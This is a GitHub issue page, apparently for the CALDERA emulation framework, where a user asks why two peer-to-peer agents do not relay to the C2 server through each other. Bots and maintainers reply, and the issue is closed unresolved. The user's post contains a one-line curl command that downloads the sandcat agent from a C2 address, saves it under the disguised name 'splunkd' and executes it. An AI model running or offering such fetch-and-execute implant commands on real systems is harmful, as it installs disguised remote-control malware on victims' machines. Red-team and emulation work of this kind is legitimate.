Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

How to set known peers parameters when deploying p2p agents #2694

Closed
zhangyuchaoxjtu opened this issue Nov 28, 2022 · 9 comments
Closed

How to set known peers parameters when deploying p2p agents #2694

zhangyuchaoxjtu opened this issue Nov 28, 2022 · 9 comments

Comments

@zhangyuchaoxjtu
Copy link

I deployed two agents with p2p mode, and I used following commands:

server="http://10.1.1.1:8888";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > splunkd;chmod +x splunkd;./splunkd -server $server -listenP2P -v

but this didn't work, the two agents cannot communicate to c2 server through the other peer when they cannot communicate to c2 server directly.
In my log, I find that the two peers' uptream destination are all c2 server's address( 10.1.1.1:8888).

@github-actions
Copy link

Looks like your first issue -- we aim to respond to issues as quickly as possible. In the meantime, check out our documentation here: http://caldera.readthedocs.io/

@github-actions
Copy link

This issue is stale because it has been open 20 days with no activity. Remove stale label or comment or this will be closed in 5 days

@elegantmoose
Copy link
Contributor

@yee-jonathan @uruwhy - Any idea here?

@github-actions
Copy link

This issue is stale because it has been open 20 days with no activity. Remove stale label or comment or this will be closed in 5 days

@github-actions
Copy link

github-actions bot commented Feb 5, 2023

This issue is stale because it has been open 20 days with no activity. Remove stale label or comment or this will be closed in 5 days

@elegantmoose
Copy link
Contributor

@zhangyuchaoxjtu Still having this issue?

@github-actions
Copy link

This issue is stale because it has been open 20 days with no activity. Remove stale label or comment or this will be closed in 5 days

@github-actions
Copy link

github-actions bot commented Apr 8, 2023

This issue is stale because it has been open 20 days with no activity. Remove stale label or comment or this will be closed in 5 days

@elegantmoose
Copy link
Contributor

@zhangyuchaoxjtu - Reopen if still having issue.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

3 participants